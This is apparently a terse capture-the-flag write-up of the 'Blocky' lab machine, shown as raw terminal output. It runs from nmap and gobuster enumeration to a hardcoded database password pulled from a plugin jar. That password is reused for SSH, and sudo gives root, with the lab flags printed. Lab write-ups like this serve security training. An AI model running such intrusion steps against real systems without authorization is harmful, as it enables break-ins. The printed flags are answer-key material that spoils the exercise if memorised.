Blocky

❯ nmap -sCV -T4 10.129.6.2
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-27 22:34 +0900
Nmap scan report for 10.129.6.2
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp?
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://blocky.htb
8192/tcp closed sophos
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 265.04 seconds

❯ ftp 10.129.6.2
Connected to 10.129.6.2.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.129.6.2]
Name (10.129.6.2:nabeen):

10.129.6.2 blocky.htb

❯   gobuster dir -u http://10.129.6.2/ \
    -H "Host: blocky.htb" \
    -w /usr/share/seclists/Discovery/Web-Content/common.txt \
    -x jar,zip,txt,php,html \
    -t 10 --timeout 15s --delay 100ms -b 403,404
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.6.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Delay:                   100ms
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              txt,php,html,jar,zip
[+] Timeout:                 15s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
Progress: 13801 / 28500 (48.42%)[ERROR] error on word index.php: timeout occurred during the request
javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
license.txt          (Status: 200) [Size: 19935]
phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
readme.html          (Status: 200) [Size: 7413]

❯ strings BlockyCore.jar 
META-INF/MANIFEST.MF
LK-.
com/myfirstplugin/BlockyCore.class
@tF_
bgGo
![s}
n-cy
]wz"tF4
Y7Kg
qwI`
9P{[
META-INF/MANIFEST.MF
com/myfirstplugin/BlockyCore.classPK

unzip BlockyCore.jar -d blockycore

❯ cat blockycore/com/myfirstplugin/BlockyCore.class    
����4-com/myfirstplugin/BlockyCorejava/lang/ObjectsqlHostLjava/lang/String;sqlUsersqlPass<init>()VCode  
  
  
       localhost  
                      root  
                              8YsqfCTnvxAUeduzjNSXe22  
onServerStart                                          LineNumberTableLocalVariableTablethisLcom/myfirstplugin/BlockyCore;  
            onServerStop  
                        onPlayerJoi"TODO get usernam$!Welcome to the BlockyCraft!!!!!!!  
&  
'(  
  sendMessage'(Ljava/lang/String;Ljava/lang/String;)usernamemessage  
SourceFileBlockyCore.java!  
  
Q*�  
  *�*�*�▒�▒  
  
  
  
▒  
  
  
  
▒  
  
  
       *!#�%�▒  
   
  
       �▒

ssh [email protected]

notch@Blocky:~$ cat user.txt
242c17c4687257d95109b42f94714378

$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch@Blocky:~$ sudo -i
[sudo] password for notch:
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
e18f77dff1757b9f7dca578553a5dd00